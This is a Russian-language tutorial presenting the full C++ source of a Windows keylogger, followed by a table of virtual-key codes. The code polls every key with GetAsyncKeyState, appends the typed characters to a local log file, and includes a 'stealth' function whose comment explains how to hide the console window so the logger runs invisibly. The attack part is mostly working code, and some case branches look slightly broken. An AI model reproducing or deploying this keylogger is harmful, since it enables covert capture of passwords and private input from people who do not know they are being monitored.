Пишем простой кейлоггер (keylogger) на С++. Режим видимый и невидимый.
Кейлоггер (keylogger) - программное обеспечение или аппаратное устройство, регистрирующее различные действия пользователя — нажатия клавиш на клавиатуре компьютера, движения и нажатия клавиш мыши и т. д.
Code.cpp
#include <iostream>
#include <windows.h>
#include <fstream.h>
#include <string>
bool is_capslock = false;
int BackSp = 0; //Переменная для BackSpace
//Начало. Запись лога.
int save(int key)
{
std::ofstream out_file;
out_file.open("logs.txt", std::ios_base::app);
std::string sLogs = "";
time_t t = time(0);
//Конец. Запись лога.
switch (key) {
//Начало. Цифровая клавиатура.
//Почему case не с 1& Потому как используется десятичное число кодов клавиш.
//Клавиша 0 (ноль) имеет код 96
case 96:
BackSp = 0;
sLogs += "0";
break;
case 97:
BackSp = 0;
sLogs += "1";
break;
case 98:
BackSp = 0;
sLogs += "2";
break;
case 99:
BackSp = 0;
sLogs += "3";
break;
case 100:
BackSp = 0;
sLogs += "4";
break;
case 101:
BackSp = 0;
sLogs += "5";
break;
case 102:
BackSp = 0;
sLogs += "6";
break;
case 103:
BackSp = 0;
sLogs += "7";
break;
case 104:
BackSp = 0;
sLogs += "8";
break;
case 105:
BackSp = 0;
sLogs += "9";
break;
// Конец. Цифровая клавиатура
//Начало. Клавиатура вверху.
case 48:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += ")";
}
else
sLogs += "0";
break;
case 49:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "!";
}
else
sLogs += "1";
break;
case 50:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "@";
}
else
sLogs += "2";
break;
case 51:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "#";
}
else
sLogs += "3";
break;
case 52:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "$";
}
else
sLogs += "4";
break;
case 53:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "%";
}
else
sLogs += "5";
break;
case 54:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "^";
}
else
sLogs += "6";
break;
case 55:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "&";
}
else
sLogs += "7";
break;
case 56:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "*";
}
else
sLogs += "8";
break;
case 57:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "(";
}
else
sLogs += "9";
break;
//Конец. Клавиатура вверху
//Начало. Ввод набора букв с клавиатуры.
//Используем таблицу символов Юников (Unicode)
//Например, код Ą соответствует латинской заглавной букве А
case 65:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "Ą";
}
else
sLogs += "A";
}
else {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "ą";
}
else
sLogs += "a";
}
break;
case 66:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "B";
}
else
sLogs += "b";
break;
case 67:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "Ć";
}
else {
sLogs += "C";
}
}
else {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "ć";
}
else {
sLogs += "c";
}
}
break;
case 68:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "D";
}
else
sLogs += "d";
break;
case 69:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "Ę";
}
else {
sLogs += "E";
}
}
else {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "ę";
}
else {
sLogs += "e";
}
}
break;
case 70:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "F";
}
else
sLogs += "f";
break;
case 71:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "G";
}
else
sLogs += "g";
break;
case 72:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "H";
}
else
sLogs += "h";
break;
case 73:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "I";
}
else
sLogs += "i";
break;
case 74:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "J";
}
else
sLogs += "j";
break;
case 75:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "K";
}
else
sLogs += "k";
break;
case 76:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "Ł";
}
else {
sLogs += "L";
}
}
else {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "&322";
}
else {
sLogs += "l";
}
}
break;
case 77:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "M";
}
else
sLogs += "m";
break;
case 78:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "Ń";
}
else {
sLogs += "N";
}
break;
}
else {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "ń";
}
else {
sLogs += "n";
}
}
break;
case 79:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "Ó";
}
else {
sLogs += "O";
}
break;
}
else {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "ó";
}
else {
sLogs += "o";
}
}
break;
case 80:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "P";
break;
}
else
sLogs += "p";
break;
case 81:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT))
{
sLogs += "Q";
break;
}
else
sLogs += "q";
break;
case 82:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "R";
break;
}
else
sLogs += "r";
break;
case 83:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "Ś";
}
else {
sLogs += "S";
}
break;
}
else {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "ś";
}
else {
sLogs += "s";
}
}
break;
case 84:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "T";
break;
}
else
sLogs += "t";
break;
case 85:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "U";
break;
}
else {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "ˆ";
}
else {
sLogs += "u";
}
}
break;
case 86:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "V";
break;
}
else
sLogs += "v";
break;
case 87:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "W";
break;
}
else
sLogs += "w";
break;
case 88:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "Ź";
}
else {
sLogs += "X";
}
break;
}
else {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "ź";
}
else {
sLogs += "x";
}
}
break;
case 89:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
sLogs += "Y";
break;
}
else
sLogs += "y";
break;
case 90:
BackSp = 0;
if (GetAsyncKeyState(VK_LSHIFT) || GetAsyncKeyState(VK_RSHIFT)) {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "Ż";
}
else {
sLogs += "Z";
}
break;
}
else {
if (GetAsyncKeyState(VK_MENU)) {
sLogs += "ż";
}
else {
sLogs += "z";
}
}
//Начало. Ввод набора букв с клавиатуры.
//Десятичные коды клавиш.
case 13:
BackSp = 0;
sLogs += "\n";
break;
case 20:
BackSp = 0;
if (is_capslock == false) {
is_capslock = true;
sLogs += " [CapsLock] ";
}
else {
is_capslock = false;
sLogs += " [/CapsLock] ";
}
break;
case VK_BACK:
BackSp += 1;
sLogs += " [";
sLogs += BackSp + '0';
sLogs += "x";
sLogs += "Backspace]";
break;
case VK_SPACE:
BackSp = 0;
sLogs += " ";
break;
case VK_MULTIPLY:
BackSp = 0;
sLogs += "*";
break;
case VK_ADD:
BackSp = 0;
sLogs += "+";
break;
case VK_SUBTRACT:
BackSp = 0;
sLogs += "-";
break;
case VK_DECIMAL:
BackSp = 0;
sLogs += ".";
break;
case VK_DIVIDE:
BackSp = 0;
sLogs += "/";
break;
default:
break;
}
//Конец. Ввод набора букв с клавиатуры.
out_file << sLogs; //Записывает данные
out_file.close(); //Закрываем запись
return 0;
}
//Начало. Видимость окна.
void stealth() {
HWND stealth;
AllocConsole();
stealth = FindWindowA("consoleWindowClass", NULL);
ShowWindow(stealth, 1); //1-видим окно, 0 - невидмиое окно
}
//Конец. Видимость окна.
using namespace std;
int main(int argc, char * argv[]) {
stealth();
char buffer[MAX_PATH];
::GetModuleFileNameA(NULL, buffer, MAX_PATH);
char i;
while (1) {
for (i = 8; i <= 190; i++) {
if (GetAsyncKeyState(i) == -32767)
save(i);
}
}
return 0;
}
Десятичные кода и константы клавиш клавиатуры и мыши.
|
Клавиша |
Десятичное число
|
Константа
|
||
|
Кнопки мыши
|
||||
| Левая кнопка | 1 | LBUTTON | ||
| Правая кнопка | 2 | RBUTTON | ||
| Средняя кнопка | 4 | MBUTTON | ||
|
Клавиши основной клавиатуры
|
||||
| F1 | 112 | F1 | ||
| F2 | 113 | F2 | ||
| F3 | 114 | F3 | ||
| F4 | 115 | F4 | ||
| F5 | 116 | F5 | ||
| F6 | 117 | F6 | ||
| F7 | 118 | F7 | ||
| F8 | 119 | F8 | ||
| F9 | 120 | F9 | ||
| F10 | 121 | F10 | ||
| F11 | 122 | F11 | ||
| F12 | 123 | F12 | ||
| пробел | 32 | SPACE | ||
| BackSpace | 8 | BACK | ||
| Tab | 9 | TAB | ||
| Enter | 13 | RETURN | ||
| Shift | 16 | SHIFT | ||
| Ctrl | 17 | CONTROL | ||
| Alt | 18 | MENU | ||
| CapsLock | 20 | CAPITAL | ||
| Esc | 27 | ESCAPE | ||
| Insert | 45 | INSERT | ||
| PageUp | 33 | PRIOR | ||
| PageDown | 34 | NEXT | ||
| End | 35 | END | ||
| Home | 36 | HOME | ||
| курсор < | 37 | LEFT | ||
| курсор ^ | 38 | UP | ||
| курсор > | 39 | RIGHT | ||
| курсор v | 40 | DOWN | ||
| Delete | 46 | DELETE | ||
| PrintScreen | 44 | SNAPSHOT | ||
| ScrollLock | 145 | SCROLL | ||
| 0,) | 48 |
-
|
||
| 1 ! | 49 |
-
|
||
| 2 @ | 50 |
-
|
||
| 3 # | 51 |
-
|
||
| 4 $ | 52 |
-
|
||
| 5 % | 53 |
-
|
||
| 6 ^ | 54 |
-
|
||
| 7 & | 55 |
-
|
||
| 8 * | 56 |
-
|
||
| 9 ( | 57 |
-
|
||
| ` ~ | 192 |
-
|
||
| - _ | 189 |
-
|
||
| = + | 187 |
-
|
||
| [ { | 219 |
-
|
||
| ] } | 221 |
-
|
||
| ; : | 186 |
-
|
||
| ‘ « | 222 |
-
|
||
| \ | | 220 |
-
|
||
| , < | 188 |
-
|
||
| . > | 190 |
-
|
||
| / ? | 191 |
-
|
||
| a A | 65 |
-
|
||
| b B | 66 |
-
|
||
| c C | 67 |
-
|
||
| d D | 68 |
-
|
||
| e E | 69 |
-
|
||
| f F | 70 |
-
|
||
| g G | 71 |
-
|
||
| h H | 72 |
-
|
||
| i I | 73 |
-
|
||
| j J | 74 |
-
|
||
| k K | 75 |
-
|
||
| l L | 76 |
-
|
||
| m M | 77 |
-
|
||
| n N | 78 |
-
|
||
| o O | 79 |
-
|
||
| p P | 80 |
-
|
||
| q Q | 81 |
-
|
||
| r R | 82 |
-
|
||
| s S | 83 |
-
|
||
| t T | 84 |
-
|
||
| u U | 85 |
-
|
||
| v V | 86 |
-
|
||
| w W | 87 |
-
|
||
| x X | 88 |
-
|
||
| y Y | 89 |
-
|
||
| z Z | 90 |
-
|
||
| Win(Л) | 91 | LWIN | ||
| Win(Пр) | 92 | RWIN | ||
|
На правой клавиатуре при выключенной клавише NumLock
|
||||
| 0 | 96 | NUMPAD0 | ||
| 1 | 97 | NUMPAD1 | ||
| 2 | 98 | NUMPAD2 | ||
| 3 | 99 | NUMPAD3 | ||
| 4 | 100 | NUMPAD4 | ||
| 5 | 101 | NUMPAD5 | ||
| 6 | 102 | NUMPAD6 | ||
| 7 | 103 | NUMPAD7 | ||
| 8 | 104 | NUMPAD8 | ||
| 9 | 105 | NUMPAD9 | ||
| * | 106 | MULTIPLY | ||
| + | 107 | ADD | ||
| - | 108 | SUBTRACT | ||
| . | 109 | DECIMAL | ||
| / | 110 | DIVIDE | ||
